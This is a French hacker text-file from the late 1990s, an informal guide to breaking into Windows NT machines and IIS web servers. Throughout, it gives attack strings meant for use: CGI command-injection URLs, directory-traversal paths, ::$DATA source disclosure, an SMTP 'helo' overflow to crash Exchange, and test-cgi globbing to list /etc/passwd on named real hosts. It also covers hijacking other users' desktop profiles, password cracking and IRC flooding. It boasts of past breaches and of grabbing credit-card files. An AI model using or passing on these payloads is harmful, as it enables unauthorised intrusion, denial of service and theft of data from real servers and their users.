***************************
**                       **
** Hacker son windows nt **
**       (c) putois      **
***************************

Well, encore une doc , et voui encore une !,qui
va essayer d'expliquer comment hacker  un windows nt
sans cette affreux NBTSTAT,que l'on retrouve partout et 
a force ca devient lassant.

Note sur nbtstat:
-----------------

Il est dit nul part que pour mener a bien cette mission il faut executer la
commande CMD sous le shell de nt,pour pouvoir se servir du Net View .

On peut evidemment taper net start pour lancer les service du netbios etc..
De plus le nbtstat est utiliser sur les ports: 137, 138, 139.

Windows nt en local:
--------------------
Pour le cas que vous �tes stagaire,et que vous avez votre login sur une 
partie du reseau du centre,

        1: Ya qu'a savoir si ils ont acces sur le web,et d'essayer si ca 
marche en telnet ya qu'a se brancher avec son compte
        2: Ya qu'a regarder dans \windows\profiles\ si ya pas les nom d'utili
sateur dans les repertoires,si oui placez vous dans un repertoire et faites
exit.La machine redemarre le bureau sous le nom d'utilisateur choisi.
        3: Pour cracker les pwl ya qu'a se demerder et cherche un programme
au nom de GLIDE prevu a cette effet.

Sniffing:
---------
Methode qui consiste a envoyer des pacquets pour tracer un serveur.Exemple
tracert ip,ou faite un tracert sur le cisco de la machine sur le port 11 et
le systat donne toute les ip local.

Notes: Cisco = routeur.
logiciel dispo: tout les portpro,portscan etc, et un autre au nom de 
ETHERPEEK,(tres bien celui la y fait comme un linux ;) )

Go To ThE wEb
=============
La Methode IIS , -> Internet Iformation Server

IIS v1.0:
---------
c'est pour le cas ou le directory des CGI s'appel script soit par 
www.toto.com/cgi ou www.toto.com/script,cette methode consiste a lister le
directory du server et permet d'executer des commandes avec CMD.exe:

 /scripts/toto.bat?&dir+c:\+?&time
 /scripts/toto.cmd?&dir+c:\+?&time

il Run sur les versions nt 3.0 et inferieur ou sur le tres grand reseau d'une
unversite ou toute autre grosse merde militaire etc.

Et si ca marche? (oh joie)!Ben votre navigateur affiche le directory comme
quand on mets c: dans le location,ou alors ca demande si on veut sauvegarder
dans le blocnote.exe,et bien sur ca start une command dowload.

The syntax: /scripts/toto.bat?&COMMAND1+?&COMMAND2
----------
iis Win NT 4.0
--------------

Crash ServeR: Marche en telnet sur le port 80 de l'ip distante
commande: GET ../ .. , et apuuyez sur <ENTER>,ca marche sur tout ce qui est
Proxy server.Ou autre merde genre moteur de recherche comme yahoo,ya qu'a 
aller sur /cgi-bin/.. et si ca vous donne une erreur avec Content-type vous 
avez des chance!

Note:Pensez a respecter les espaces.

iis Loopback:
------------

Fonctionne avec le ism.dll qui gere les passwords.

The syntax: /scripts/iisadmin/ism.dll?http/dir   ou /_vti_bin/

Root directory et download:     NT 4.0, IIS 1.0
---------------------------

Toujours du meme principe que le get ../ mais par le web cette fois qui 
permet d'avoir le c:.

http://www.domain.com/..\.. ou http://www.domain.com/scripts..\..\scriptname

Bat create: Win NT 4.0
-----------
/scripts/exploit.bat>PATH\target.bat

Crash Port 25: Microsoft Exchange Internet Mail Service  
-------------

Buffer overflow pour la version 5.5. 

1- faire un telnet sur le port 25 de l'ip distance et tapez helo aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa etc pendant deux page et ...

2- helo blah.net . MAIL FROM:aaaaaaaaaaaaaaaaaaa etc

* Dis dans rootshell et bugtraq

250 mhs.jpl.nasa.gov G'day [194.xx.xx.xx]!  Why do you call yourself aaa? ;-)

Les fichiers ASP.
----------------

DEfault.asp: Telnet 80         IIS/4.0
-----------

 GET /default.asp?cid=[*]&v=3086&pw=8F4272A6Fc6FDFDFAAD3B435B51404EE

Buffer overflow qui donne le password crypte:8F4272A6Fc6FDFDFAAD3B435B51404EE

Asp source viewver:
-------------------

index.asp::$DATA  pour voir le source du asp 

Flooding: C'est le fait d'envoyer quelquue centaine de mot pour deconnecter
---------
une machine.Sur irc tu prends dcc fuck tu va sur ircnet et t'envoie des /who
*.jp hehe.

NT SYN:     Win NT 3.51, 4.0
-------
 
 netstat -n -p tcp

NETCAT:
------

Bug plus connu sur les unix,beos,linux etc permet de faire des ls par le 
port 80 avec un *.Exemple:www.navi.mil/cgi-bin/test-cgi  * pour lister le
contenu du /cgi-bin/ , test-cgi /* pour lister le directory,
www.navy.mil/cgi-bin/test-cgi/ /*etc/* si tu veux te placer dans /etc,
www.navy.mil/cgi-bin/test-cgi /*/passwd pour une recherche de fichier.

Notes: Run only avec les netscape3 et pas avec netscape 4 ie4 etc,moi j'ai
netscape 3us,, ou trouver? go to www.filez.com et tape N16E comme mot clef

Mygale.org hacked on 97/98 by test-cgi le but etait simple yavais juste a
aller dans la creation de compte et de taper password * et sa donnais la 
liste des users.Le meme effet s'est produit sur angelfire.com,meme principe
et chez.com.Enfin bref si vous avez un server de commande avec test-cgi vous
pouvez mettre toujours credit-cards * lol

Notes: un petit mot pour le netcat |nc removed.com , pour le telecharger,
aller sur: http://www.l0pht.com/users/10pht/nc11nt.zip d'apres eux on 
pourrait meme faire un cp et un mv ce qui pourrait etre interressant si on
pouvais deplacer un file vers une ip.


-----  *   *   ----
  -    *****   --
  -    *****   --
  -    *   *   ----     ENdS.         (c) putois




 

